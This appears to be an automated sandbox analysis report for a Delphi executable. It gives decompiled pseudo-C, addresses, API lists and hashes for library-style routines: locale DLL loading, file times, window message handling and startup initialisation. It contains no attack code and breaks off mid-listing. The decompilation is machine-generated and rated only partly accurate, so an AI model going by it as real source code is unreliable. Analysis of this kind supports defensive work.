                                  Function 004054E0, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 340 4054e0-405511 lstrcpyn GetThreadLocale GetLocaleInfoA 341 405517-40551b 340->341 342 4055fa-405601 340->342 343 405527-40553d lstrlen 341->343 344 40551d-405521 341->344 345 405540-405543 343->345 344->342 344->343 346 405545-40554d 345->346 347 40554f-405557 345->347 346->347 348 40553f 346->348 347->342 349 40555d-405562 347->349 348->345 350 405564-40558a lstrcpyn LoadLibraryExA 349->350 351 40558c-40558e 349->351 350->351 351->342 352 405590-405594 351->352 352->342 353 405596-4055c6 lstrcpyn LoadLibraryExA 352->353 353->342 354 4055c8-4055f8 lstrcpyn LoadLibraryExA 353->354 354->342
                                  C-Code - Quality: 61%
                                  			E004054E0() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L004012A4();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L004012AC();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L004012A4();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L004012A4();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L004012A4();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                  0x004054e0
                                  0x004054e8
                                  0x004054ef
                                  0x004054f0
                                  0x00405503
                                  0x00405508
                                  0x00405511
                                  0x004055fa
                                  0x00405601
                                  0x00405527
                                  0x00405527
                                  0x0040552d
                                  0x0040552e
                                  0x0040553b
                                  0x00405540
                                  0x00405543
                                  0x0040553f
                                  0x00000000
                                  0x0040553f
                                  0x0040554f
                                  0x00405557
                                  0x0040555d
                                  0x00405562
                                  0x0040556f
                                  0x00405573
                                  0x00405574
                                  0x00405575
                                  0x0040558a
                                  0x0040558a
                                  0x0040558e
                                  0x004055a7
                                  0x004055ab
                                  0x004055ac
                                  0x004055ad
                                  0x004055bd
                                  0x004055c2
                                  0x004055c6
                                  0x004055c8
                                  0x004055dd
                                  0x004055e1
                                  0x004055e2
                                  0x004055e3
                                  0x004055f3
                                  0x004055f8
                                  0x004055f8
                                  0x004055c6
                                  0x0040558e
                                  0x00000000
                                  0x00405557

                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004054F0
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004054FD
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405503
                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040552E
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405575
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405585
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004055AD
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004055BD
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004055E3
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 004055F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: 1c0307bdf859cac68a25c2be1f343d9d7b151e599dabd334f45a1d332d4b66c5
                                  • Instruction ID: 350faaa782958afa505727a167083beb2ef07057b49d1c98d2300e36eef25666
                                  • Opcode Fuzzy Hash: 1c0307bdf859cac68a25c2be1f343d9d7b151e599dabd334f45a1d332d4b66c5
                                  • Instruction Fuzzy Hash: 39319E71E0065C7AEB25D6B8DC46BEF67AD8B04344F4401FBA608F62C5E6BC8E848F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040850C, Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040850C(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E004045DC(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16); // executed
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                  0x00408527
                                  0x0040852f
                                  0x00408565
                                  0x00408565
                                  0x00408531
                                  0x00408532
                                  0x0040853e
                                  0x00000000
                                  0x00408540
                                  0x0040854b
                                  0x00408563
                                  0x00000000
                                  0x00000000
                                  0x00408563
                                  0x0040853e
                                  0x00408573

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00408527
                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 00408532
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040854B
                                  • FileTimeToDosDateTime.KERNEL32 ref: 0040855C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                  • String ID:
                                  • API String ID: 2659516521-0
                                  • Opcode ID: 6d36fbfac318439910e8bd0a072bb07faff9887ed9fffeb9dd64a1d57231916d
                                  • Instruction ID: dfc44b73f87521a87b323e5a94258fd219a89f02d2ec73349c8c5ff1fbea0109
                                  • Opcode Fuzzy Hash: 6d36fbfac318439910e8bd0a072bb07faff9887ed9fffeb9dd64a1d57231916d
                                  • Instruction Fuzzy Hash: 75F0FF7290020C7ACB20EAF58D85ACFB3BC5B09314F1006B7B559F31D2EA389B148B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439164, Relevance: 3.2, APIs: 2, Instructions: 158COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00439164(intOrPtr* __eax, intOrPtr* __edx) {
				char _v20;
				short _v24;
				char _v28;
				short _v30;
				intOrPtr _t23;
				signed int _t25;
				signed int _t27;
				void* _t29;
				signed int _t31;
				void* _t38;
				signed int _t39;
				void* _t55;
				void* _t59;
				void* _t61;
				struct HWND__* _t62;
				signed int _t63;
				signed int _t64;
				intOrPtr* _t71;
				signed int _t92;
				signed int _t93;
				short* _t96;
				void* _t97;

				_t96 =  &_v20;
				_t71 = __edx;
				_t95 = __eax;
				_t23 =  *__edx;
				_t97 = _t23 - 0x84;
				if(_t97 > 0) {
					_t25 = _t23 + 0xffffff00 - 0xa;
					__eflags = _t25;
					if(_t25 < 0) {
						_t27 = E00435358(__eax);
						__eflags = _t27;
						if(_t27 != 0) {
							L39:
							return _t27;
						}
						L38:
						_t29 = E00435EB4(_t95, _t71); // executed
						return _t29;
					}
					_t31 = _t25 + 0xffffff0a - 0xb;
					__eflags = _t31;
					if(_t31 < 0) {
						_t27 = E004390B0(__eax, __edx);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L38;
						}
						__eflags =  *(_t71 + 0xc);
						if( *(_t71 + 0xc) != 0) {
							goto L39;
						}
						_t27 = E0043BD58(_t95);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L39;
						}
						_push( *((intOrPtr*)(_t71 + 8)));
						_push( *((intOrPtr*)(_t71 + 4)));
						_push( *_t71);
						_t38 = E0043BA58(_t95);
						_push(_t38);
						L004065DC();
						return _t38;
					}
					_t39 = _t31 - 0xae3c;
					__eflags = _t39;
					if(_t39 == 0) {
						_t92 = E0044C8E0(__eax, 1);
						__eflags = _t92;
						if(_t92 != 0) {
							__eflags = _t95 - _t92;
							if(_t95 != _t92) {
								E00435DE4(_t92,  *((intOrPtr*)(_t71 + 4)), 0xb047,  *((intOrPtr*)(_t71 + 8)));
							}
						}
						goto L38;
					}
					__eflags = _t39 == 3;
					if(_t39 == 3) {
						return  *((intOrPtr*)( *__eax + 0xb0))();
					} else {
						goto L38;
					}
				}
				if(_t97 == 0) {
					_t27 = E00435EB4(__eax, __edx);
					__eflags =  *((intOrPtr*)(__edx + 0xc)) - 0xffffffff;
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L39;
					}
					 *_t96 =  *((intOrPtr*)(__edx + 8));
					_v28 =  *_t96;
					_v24 = _v30;
					E004346D0(_t95,  &_v20,  &_v28);
					_t27 = E00438EA0(_t95, 0,  &_v20, 0, 0);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L39;
					}
					 *(_t71 + 0xc) = 1;
					return _t27;
				}
				_t55 = _t23 - 7;
				if(_t55 == 0) {
					_t93 = E0044C8E0(__eax, 1);
					__eflags = _t93;
					if(_t93 == 0) {
						goto L38;
					}
					_t27 =  *((intOrPtr*)( *_t93 + 0xf4))();
					__eflags = _t27;
					if(_t27 == 0) {
						goto L39;
					}
					goto L38;
				}
				_t27 = _t55 - 1;
				if(_t27 == 0) {
					__eflags =  *(__eax + 0x54) & 0x00000020;
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L39;
					}
					goto L38;
				}
				_t59 = _t27 - 0x17;
				if(_t59 == 0) {
					_t61 = E0043BA58(__eax);
					_t62 = GetCapture();
					__eflags = _t61 - _t62;
					if(_t61 == _t62) {
						__eflags =  *0x46edb0;
						if( *0x46edb0 != 0) {
							_t63 =  *0x46edb0; // 0x0
							__eflags = _t95 -  *((intOrPtr*)(_t63 + 0x30));
							if(_t95 ==  *((intOrPtr*)(_t63 + 0x30))) {
								_t64 =  *0x46edb0; // 0x0
								E00435DE4(_t64, 0, 0x1f, 0);
							}
						}
					}
					goto L38;
				}
				if(_t59 == 2) {
					_t27 = E00438F64(__eax, 0, __edx, __eflags);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L38;
					}
					__eflags =  *(_t71 + 0xc);
					if( *(_t71 + 0xc) != 0) {
						goto L39;
					}
					_t27 = E0043BD58(_t95);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L39;
					}
					return E00435EB4(_t95, _t71);
				} else {
					goto L38;
				}
			}

























                                  0x00439167
                                  0x0043916a
                                  0x0043916c
                                  0x0043916e
                                  0x00439170
                                  0x00439175
                                  0x004391a9
                                  0x004391a9
                                  0x004391ac
                                  0x00439315
                                  0x0043931a
                                  0x0043931c
                                  0x00439375
                                  0x00439375
                                  0x00439375
                                  0x00439366
                                  0x0043936a
                                  0x00000000
                                  0x0043936a
                                  0x004391b7
                                  0x004391b7
                                  0x004391ba
                                  0x004392a5
                                  0x004392aa
                                  0x004392ac
                                  0x00000000
                                  0x00000000
                                  0x004392b2
                                  0x004392b6
                                  0x00000000
                                  0x00000000
                                  0x004392be
                                  0x004392c3
                                  0x004392c5
                                  0x00000000
                                  0x00000000
                                  0x004392ce
                                  0x004392d2
                                  0x004392d5
                                  0x004392d8
                                  0x004392dd
                                  0x004392de
                                  0x00000000
                                  0x004392de
                                  0x004391c0
                                  0x004391c0
                                  0x004391c5
                                  0x004391de
                                  0x004391e0
                                  0x004391e2
                                  0x004391e8
                                  0x004391ea
                                  0x004391fe
                                  0x004391fe
                                  0x004391ea
                                  0x00000000
                                  0x004391e2
                                  0x004391c7
                                  0x004391ca
                                  0x00000000
                                  0x004391d0
                                  0x00000000
                                  0x004391d0
                                  0x004391ca
                                  0x00439177
                                  0x00439247
                                  0x0043924c
                                  0x00439250
                                  0x00000000
                                  0x00000000
                                  0x00439259
                                  0x00439260
                                  0x00439269
                                  0x0043927b
                                  0x00439288
                                  0x0043928d
                                  0x0043928f
                                  0x00000000
                                  0x00000000
                                  0x00439295
                                  0x00000000
                                  0x00439295
                                  0x0043917d
                                  0x00439180
                                  0x00439211
                                  0x00439213
                                  0x00439215
                                  0x00000000
                                  0x00000000
                                  0x00439221
                                  0x00439227
                                  0x00439229
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043922f
                                  0x00439186
                                  0x00439187
                                  0x00439234
                                  0x00439238
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043923e
                                  0x0043918d
                                  0x00439190
                                  0x00439322
                                  0x00439329
                                  0x0043932e
                                  0x00439330
                                  0x00439332
                                  0x00439339
                                  0x0043933b
                                  0x00439340
                                  0x00439343
                                  0x0043934e
                                  0x00439353
                                  0x00439353
                                  0x00439343
                                  0x00439339
                                  0x00000000
                                  0x00439330
                                  0x00439199
                                  0x004392ee
                                  0x004392f3
                                  0x004392f5
                                  0x00000000
                                  0x00000000
                                  0x004392f7
                                  0x004392fb
                                  0x00000000
                                  0x00000000
                                  0x004392ff
                                  0x00439304
                                  0x00439306
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043919f
                                  0x00000000
                                  0x0043919f

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-0
                                  • Opcode ID: 0f1ff6185bd36a70e3a3b68e6a5d70dfe93b48ff67c49739f0d1f1408d26497b
                                  • Instruction ID: ecd7fcb2517a2c3b73fce16e1ad2478b52199ab01e9d76c7ca558aaf7ea5c07c
                                  • Opcode Fuzzy Hash: 0f1ff6185bd36a70e3a3b68e6a5d70dfe93b48ff67c49739f0d1f1408d26497b
                                  • Instruction Fuzzy Hash: A54162B130460187EA10BA2E89C576E62DAAB4C758F14616BEC45CB3C5DBBDCE06874E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00435EB4, Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00435EB4(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t98;
				void* _t109;

				_t79 = __edx;
				_t98 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x109) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043472C(_t98, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t98 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t98 + 0x50) & 0x00000080;
						if(( *(_t98 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x46fc50; // 0x470b40
								E004570D0( *_t47, _t79, _t98, __eflags, _t109);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t98 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t98 + 0x54) =  *(_t98 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403594(_t98, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t98 + 0x54) =  *(_t98 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x470aa0; // 0x0
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x470aa0; // 0x0
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x470aa0; // 0x0
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E0044C824( &_v280);
								_v14 = _t79[1] & 0x0000ffff;
								_v12 = _t79[2];
								return E00403594(_t98, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E0044C8E0(_t98, 1);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xfc))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E0044C8E0(__eax, 0);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x268)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x268)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}
























                                  0x00435ec0
                                  0x00435ec2
                                  0x00435ec8
                                  0x00435f02
                                  0x00435f02
                                  0x00435f09
                                  0x00435f44
                                  0x00435f46
                                  0x00435f4b
                                  0x00436023
                                  0x00436023
                                  0x00436028
                                  0x00436035
                                  0x00436035
                                  0x0043603a
                                  0x00000000
                                  0x00436040
                                  0x00435f51
                                  0x00435f56
                                  0x00000000
                                  0x00000000
                                  0x00435f5c
                                  0x00435f60
                                  0x00435f76
                                  0x00435f78
                                  0x00435f78
                                  0x00435f7d
                                  0x00435f8a
                                  0x00435f8c
                                  0x00435f95
                                  0x00000000
                                  0x00435f95
                                  0x00435f7f
                                  0x00435f7f
                                  0x00435f80
                                  0x00435f9f
                                  0x00435f9f
                                  0x00435fa3
                                  0x00435fb5
                                  0x00000000
                                  0x00435fb5
                                  0x00000000
                                  0x00435fab
                                  0x00435f82
                                  0x00435f82
                                  0x00435f83
                                  0x00435fbc
                                  0x00000000
                                  0x00435fbc
                                  0x00435f85
                                  0x00435f86
                                  0x00000000
                                  0x00000000
                                  0x00435fc3
                                  0x00435fc8
                                  0x00435fcc
                                  0x00000000
                                  0x00435fce
                                  0x00435fce
                                  0x00435fd3
                                  0x00435fd7
                                  0x00000000
                                  0x00000000
                                  0x00435fdb
                                  0x00435fe1
                                  0x00435fe4
                                  0x00000000
                                  0x00000000
                                  0x00435fed
                                  0x00435ff4
                                  0x00436002
                                  0x00436009
                                  0x00436010
                                  0x00000000
                                  0x0043601c
                                  0x00000000
                                  0x00435fcc
                                  0x00435f62
                                  0x00435f62
                                  0x00435f67
                                  0x00435f73
                                  0x00435f73
                                  0x00435f73
                                  0x00000000
                                  0x00435f73
                                  0x00435f69
                                  0x00435f69
                                  0x00435f6c
                                  0x00000000
                                  0x00000000
                                  0x00435f6e
                                  0x00435f71
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00435f71
                                  0x00435f1b
                                  0x00435f22
                                  0x00000000
                                  0x00000000
                                  0x00435f31
                                  0x00435f39
                                  0x00000000
                                  0x00435f3f
                                  0x00435eca
                                  0x00435ed3
                                  0x00435eda
                                  0x00000000
                                  0x00435ee8
                                  0x00435ef7
                                  0x00435efc
                                  0x00000000
                                  0x00000000
                                  0x00435efc
                                  0x00435eda
                                  0x00436049

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 00435FED
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: KeyboardState
                                  • String ID:
                                  • API String ID: 1724228437-0
                                  • Opcode ID: 1877fe6a1f2c12efd9516374ee786c9bec151850e204b1f77f3cd22c5db8a17f
                                  • Instruction ID: 20541049fbaca84a1518ccd6cc0ed2cd5f2f7fc94101191d14fcc18e58a4b920
                                  • Opcode Fuzzy Hash: 1877fe6a1f2c12efd9516374ee786c9bec151850e204b1f77f3cd22c5db8a17f
                                  • Instruction Fuzzy Hash: 3241C430A006069BDB25DF29C4896AAB7F0EF0D348F649067E445DB391C778DD42CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045543C, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0045543C(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L004065DC(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                  0x00455448
                                  0x00455452
                                  0x0045545b
                                  0x00455462
                                  0x00455465
                                  0x00455466
                                  0x00455471
                                  0x00455475

                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00455466
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: a7f0a890f5c314e9b785444fcef0f2b0510aa49a97277d688b7d923261cfddac
                                  • Instruction ID: 1c27f2a9b3722435145c729b4a5680538d8c19e3b6424436bdec4861056ead6e
                                  • Opcode Fuzzy Hash: a7f0a890f5c314e9b785444fcef0f2b0510aa49a97277d688b7d923261cfddac
                                  • Instruction Fuzzy Hash: C9F0C579205608AFCB40DF9DD588D4AFBE8BB4C260B058195B988CB325C634FD81CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440E40, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00440E40(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x440fb8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00408F74("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404170(0x470ab0, _v8);
				_t25 =  *0x470ab0; // 0x0
				 *0x470aac = GlobalAddAtomA(E004045DC(_t25));
				_t29 =  *0x470664; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00408F74("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404170(0x470ab4, _v20);
				_t35 =  *0x470ab4; // 0x0
				 *0x470aae = GlobalAddAtomA(E004045DC(_t35));
				_t38 =  *0x470ab4; // 0x0
				 *0x470ab8 = RegisterClipboardFormatA(E004045DC(_t38));
				 *0x470af0 = E00413F44(1);
				E00440A48();
				 *0x470aa0 = E00440870(1, 1);
				_t47 = E0045385C(1, __edi);
				_t78 =  *0x46fda0; // 0x470b44
				 *_t78 = _t47;
				_t49 = E00454A70(0, 1);
				_t80 =  *0x46fc50; // 0x470b40
				 *_t80 = _t49;
				_t50 =  *0x46fc50; // 0x470b40
				E00456B3C( *_t50, 1);
				_t53 =  *0x42ef40; // 0x42ef44
				E004136EC(_t53, 0x431ac4, 0x431ad4);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x46ecec = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x440fbf);
				E0040411C( &_v20);
				return E0040411C( &_v8);
			}
























                                  0x00440e49
                                  0x00440e4c
                                  0x00440e51
                                  0x00440e52
                                  0x00440e57
                                  0x00440e5a
                                  0x00440e66
                                  0x00440e69
                                  0x00440e77
                                  0x00440e84
                                  0x00440e89
                                  0x00440e99
                                  0x00440ea3
                                  0x00440ea8
                                  0x00440eab
                                  0x00440eb4
                                  0x00440eb7
                                  0x00440ec8
                                  0x00440ed5
                                  0x00440eda
                                  0x00440eea
                                  0x00440ef0
                                  0x00440f00
                                  0x00440f11
                                  0x00440f16
                                  0x00440f27
                                  0x00440f35
                                  0x00440f3a
                                  0x00440f40
                                  0x00440f4b
                                  0x00440f50
                                  0x00440f56
                                  0x00440f58
                                  0x00440f61
                                  0x00440f70
                                  0x00440f75
                                  0x00440f84
                                  0x00440f88
                                  0x00440f95
                                  0x00440f95
                                  0x00440f9c
